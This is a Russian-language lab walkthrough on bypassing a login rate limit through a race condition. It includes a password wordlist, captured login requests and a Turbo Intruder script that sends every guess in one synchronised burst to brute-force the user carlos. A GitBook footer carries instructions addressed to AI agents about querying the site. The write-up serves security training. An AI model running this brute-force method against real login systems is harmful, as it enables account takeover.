> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/web/race-conditions/rate-limit-bypass-via-race-condition.md).

# Обход ограничения скорости через состояние гонки

### Обход ограничений частоты с помощью условий гонки

Механизм аутентификации устанавливает **лимит числа попыток** чтобы предотвратить атаки перебором. / Однако, \*\*было замечено\*\*, что эту защиту можно обойти из-за **условия гонки** при обработке одновременных запросов.

Цель лабораторной:

* Используйте условие гонки, чтобы обойти ограничение.
* Найдите пароль пользователя **carlos**.
* Подключитесь к приложению.
* Получите доступ к панели администратора.
* Удалить пользователя **carlos**.

#### Используемый словарь

```bash
123123
abc123
football
monkey
letmein
shadow
master
666666
qwertyuiop
123321
mustang
123456
пароль
12345678
qwerty
123456789
12345
1234
111111
1234567
dragon
1234567890
michael
x654321
superman
1qaz2wsx
baseball
7777777
121212
000000
```

#### Наблюдение за механизмом соединения

При отправке формы входа \*\*было замечено\*\*, что передается POST-запрос со следующими параметрами:

* `CSRF`
* `username`
* `пароль`

```bash
csrf=8SbZ2jaR8pdJ0Q4r0XNqmTeVk5GJHxsx&username=wiener&password=peter
```

<figure><img src="/files/b827bbf64a2d6cf741039a4faa9a1e0b174d318b" alt=""><figcaption></figcaption></figure>

После нескольких последовательных неверных попыток, **появляется сообщение**:

> *Вы сделали слишком много неверных попыток входа. Пожалуйста, попробуйте снова через XX секунд.*

Это подтверждает наличие **ограничения частоты на стороне сервера**.

<figure><img src="/files/6937634e221bbedd2528cdb05785af3e8f589389" alt=""><figcaption></figcaption></figure>

#### Обход с помощью условия гонки (ручные тесты)

\*Создание группы «условие гонки».

<figure><img src="/files/dd460ef74f21c3553dd05f25d7f869d4c3f23b3f" alt=""><figcaption></figcaption></figure>

* Дублируйте вкладку **10 раз**.

<figure><img src="/files/6db8d36081ab2c8c498ab35db69dfaa3d69cbe2c" alt=""><figcaption></figcaption></figure>

* Отправьте все запросы **параллельно**.

<figure><img src="/files/8000d92383b0ac12fc0d0a34b75753eebe938d96" alt=""><figcaption></figcaption></figure>

Тест :

```bash
csrf=ab5gEWlWPKDUCJCQAlxrxR42dLIhJCWR&username=wiener&password=test
```

Наблюдение: При отправке параллельно, **блокировка не происходит** в этом случае.

<figure><img src="/files/7735e5f2400088ad02eaf15949da01bd5d8f1883" alt=""><figcaption></figcaption></figure>

#### Параллельный брутфорс Карлоса с Turbo Intruder

* Установите и используйте **Turbo Intruder** расширение.

<figure><img src="/files/2cec6fdc0dffc8d8fa601116c3a5ef48027ddf50" alt=""><figcaption></figcaption></figure>

* Из запроса входа: **Отправить в Turbo Intruder**.

<figure><img src="/files/72d2aed35c65b4139d472ee30c7c1f7265d56dd2" alt=""><figcaption></figcaption></figure>

* Выберите **`race single packet attack.py`** скрипт.

<figure><img src="/files/06632d3b5e61a437d4d198f663e75447a40cbc76" alt=""><figcaption></figcaption></figure>

* Скопируйте словарь в **буфер обмена**, затем запустите со следующим скриптом:

```python
def queueRequests(target, wordlists):

    # если целевой сервер поддерживает HTTP/2, используйте engine=Engine.BURP2, чтобы запустить single-packet-атаку
    # если они поддерживают только HTTP/1, вместо этого используйте Engine.THREADED или Engine.BURP
    # для получения дополнительной информации см. https://portswigger.net/research/smashing-the-state-machine
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2
                           )


    passwords = wordlists.clipboard
    # аргумент 'gate' удерживает часть каждого запроса, пока не будет вызван openGate
    # если вы видите отрицательную метку времени, сервер ответил до завершения запроса
    for password in passwords:
        engine.queue(target.req, password, gate='race1')

    # как только каждый запрос с тегом 'race1' будет поставлен в очередь
    # вызовите engine.openGate(), чтобы отправить их синхронно
    engine.openGate('race1')


def handleResponse(req, interesting):
    table.add(req)

```

#### Наблюдаемый результат

При параллельной проверке всех значений для одного из паролей возвращается \*\*код HTTP 302\*\* (признак успешного входа).

<figure><img src="/files/8d8ed014facdb92711babf205b60e38900315841" alt=""><figcaption></figcaption></figure>

\*\*


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/web/race-conditions/rate-limit-bypass-via-race-condition.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
